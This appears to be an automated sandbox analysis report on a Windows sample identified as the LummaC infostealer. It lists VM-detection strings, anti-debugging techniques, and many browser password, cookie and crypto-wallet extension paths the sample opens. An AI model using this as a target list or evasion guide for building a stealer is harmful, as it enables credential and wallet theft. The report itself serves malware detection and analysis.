                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeAPI call chain: ExitProcess graph end nodegraph_0-74210

                  Anti Debugging

                  barindex
                  Contains functionality to hide a thread from the debugger
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004244E4 NtSetInformationThread 000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC640_2_004244E4
                  Found API chain indicative of debugger detection
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-74296
                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeSystem information queried: KernelDebuggerInformationJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeProcess queried: DebugFlagsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00422177 mov eax, dword ptr fs:[00000030h]0_2_00422177
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00443998 mov ecx, dword ptr fs:[00000030h]0_2_00443998
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041F9A4 mov eax, dword ptr fs:[00000030h]0_2_0041F9A4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004262A1 mov eax, dword ptr fs:[00000030h]0_2_004262A1
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043B362 mov eax, dword ptr fs:[00000030h]0_2_0043B362
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0044FB15 mov eax, dword ptr fs:[00000030h]0_2_0044FB15
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004244E4 mov eax, dword ptr fs:[00000030h]0_2_004244E4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004224A3 mov eax, dword ptr fs:[00000030h]0_2_004224A3
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004245EC mov eax, dword ptr fs:[00000030h]0_2_004245EC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00421EEB mov eax, dword ptr fs:[00000030h]0_2_00421EEB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00422817 mov eax, dword ptr fs:[00000030h]0_2_00422817
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041F916 mov eax, dword ptr fs:[00000030h]0_2_0041F916
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004269E4 mov eax, dword ptr fs:[00000030h]0_2_004269E4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00426A42 mov eax, dword ptr fs:[00000030h]0_2_00426A42
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0042F265 mov eax, dword ptr fs:[00000030h]0_2_0042F265
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00424B24 mov eax, dword ptr fs:[00000030h]0_2_00424B24
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041EBEB mov eax, dword ptr fs:[00000030h]0_2_0041EBEB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00424BED mov eax, dword ptr fs:[00000030h]0_2_00424BED
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00424C8D mov eax, dword ptr fs:[00000030h]0_2_00424C8D
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041E6F0 mov eax, dword ptr fs:[00000030h]0_2_0041E6F0
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00429EF7 mov eax, dword ptr fs:[00000030h]0_2_00429EF7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF2A7E mov eax, dword ptr fs:[00000030h]0_2_02EF2A7E
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F13BFF mov ecx, dword ptr fs:[00000030h]0_2_02F13BFF
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF4BFC mov eax, dword ptr fs:[00000030h]0_2_02EF4BFC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF4BFC mov eax, dword ptr fs:[00000030h]0_2_02EF4BFC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF23DE mov eax, dword ptr fs:[00000030h]0_2_02EF23DE
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEFB7D mov eax, dword ptr fs:[00000030h]0_2_02EEFB7D
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF4853 mov eax, dword ptr fs:[00000030h]0_2_02EF4853
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFA15E mov eax, dword ptr fs:[00000030h]0_2_02EFA15E
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEE957 mov eax, dword ptr fs:[00000030h]0_2_02EEE957
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF2152 mov eax, dword ptr fs:[00000030h]0_2_02EF2152
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED092B mov eax, dword ptr fs:[00000030h]0_2_02ED092B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF4EF4 mov eax, dword ptr fs:[00000030h]0_2_02EF4EF4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF4E54 mov eax, dword ptr fs:[00000030h]0_2_02EF4E54
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEEE52 mov eax, dword ptr fs:[00000030h]0_2_02EEEE52
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF474B mov eax, dword ptr fs:[00000030h]0_2_02EF474B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF270A mov eax, dword ptr fs:[00000030h]0_2_02EF270A
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFF4CC mov eax, dword ptr fs:[00000030h]0_2_02EFF4CC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF6CA9 mov eax, dword ptr fs:[00000030h]0_2_02EF6CA9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF6C4B mov eax, dword ptr fs:[00000030h]0_2_02EF6C4B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEFC0B mov eax, dword ptr fs:[00000030h]0_2_02EEFC0B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0B5C9 mov eax, dword ptr fs:[00000030h]0_2_02F0B5C9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF4D8B mov eax, dword ptr fs:[00000030h]0_2_02EF4D8B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED0D90 mov eax, dword ptr fs:[00000030h]0_2_02ED0D90
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F1FD7C mov eax, dword ptr fs:[00000030h]0_2_02F1FD7C
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF6508 mov eax, dword ptr fs:[00000030h]0_2_02EF6508
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F6980B push dword ptr fs:[00000030h]0_2_02F6980B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043323B GetProcessHeap,CreateDCW,GetSystemMetrics,GetSystemMetrics,DeleteDC,0_2_0043323B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043D3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043D3A0
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043CE89 SetUnhandledExceptionFilter,0_2_0043CE89
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043CE95 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043CE95
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0D0F0 SetUnhandledExceptionFilter,0_2_02F0D0F0
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0D0FC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02F0D0FC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0D607 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02F0D607
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F1E5A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02F1E5A2
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043D0B8 cpuid 0_2_0043D0B8
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0044614F GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0044614F
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00402476 GetComputerNameW,GetUserNameW,0_2_00402476
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00453BC4 GetTimeZoneInformation,0_2_00453BC4
                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 0.2.I2BJhmJou4.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.I2BJhmJou4.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.I2BJhmJou4.exe.49f0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1423642848.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: I2BJhmJou4.exe PID: 7500, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: I2BJhmJou4.exeString found in binary or memory: %appdata%\Electrum\wallets
                  Source: I2BJhmJou4.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                  Source: I2BJhmJou4.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: I2BJhmJou4.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: I2BJhmJou4.exe, 00000000.00000002.3250103126.00000000058FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance
                  Source: I2BJhmJou4.exe, 00000000.00000002.3250103126.00000000058FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum0
                  Source: I2BJhmJou4.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.000000000565F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystoremu
                  Source: I2BJhmJou4.exe, 00000000.00000002.3250103126.00000000058FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger LiveM
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcoblJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
